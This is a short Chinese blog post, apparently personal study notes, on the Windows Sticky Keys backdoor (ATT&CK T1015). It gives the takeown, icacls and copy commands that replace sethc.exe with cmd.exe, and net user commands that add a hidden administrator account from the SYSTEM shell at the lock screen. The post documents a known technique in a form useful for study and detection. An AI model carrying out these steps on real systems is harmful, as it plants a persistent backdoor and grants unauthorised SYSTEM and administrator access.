[Persistence][Privilege Escalation] T1015- Accessibility Features

Windows为特殊人士设计了轻松访问功能,比如放大镜、讲述人、粘滞键等等。利用轻松访问功能里的某些特性,可以完成提权和驻留。

一、粘滞键 Sticky Keys

粘滞键是为了方便某些人不方便同时按键的电脑使用者使用windows 快捷键,启动粘滞键后,按Ctrl+Alt+Del就可以每次按一个键。

启动粘滞键的方式是连按5次shift键,即使是锁屏的情况下也可以;而且,在锁屏状态下是以system权限启动sethc.exe的。

  

 

1. 替换sethc.exe

将sethc.exe替换成cmd.exe,就可以实现提权和驻留,但sethc.exe的owner是TrustInstaller,Administrators组也没有写权限。

 

因此先使用takeown将owner改为当前用户,这样就有修改权限了, 再授予Administrators组Full Conrol权限。

C:\Windows\system32>takeown.exe /F c:\Windows\System32\sethc.exe

SUCCESS: The file (or folder): "c:\Windows\System32\sethc.exe" now owned by user "RING\win10".

C:\Windows\system32>icacls c:\Windows\System32\sethc.exe /grant Administrators:F
processed file: c:\Windows\System32\sethc.exe
Successfully processed 1 files; Failed processing 0 files

 

此时再copy就没有问题了

C:\Windows\system32>copy cmd.exe sethc.exe /y
        1 file(s) copied.

 

2. 使用后门

连按5次shift启动cmd.exe, 锁屏状态下是以system权限启动的 !!!

 

能做的操作有很多,比如添加新用户

net user test Password123 /add
net localgroup administrators test /add

 

不过网络攻击中怎么满足锁屏状态下按5次shift键呢??? 似乎可用性不是很强

3. 命令备注:

takeown /F X:\FULL_PATH_TO_FOLDER
icacls X:\FULL_PATH_TO_FOLDER /grant Administrators:F
# 作用到子文件及子文件夹
takeown
/F X:\FULL_PATH_TO_FOLDER /r /d y icacls X:\FULL_PATH_TO_FOLDER /grant Administrators:F /t

 

参考:

https://thegeekpage.com/solved-failed-to-enumerate-objects-in-the-container-windows-10-error/

https://www.cnblogs.com/BOHB-yunying/p/11695140.html

 

 

 

 

 

posted @ 2020-03-21 21:55  ring_lcy  阅读(263)  评论(0编辑  收藏  举报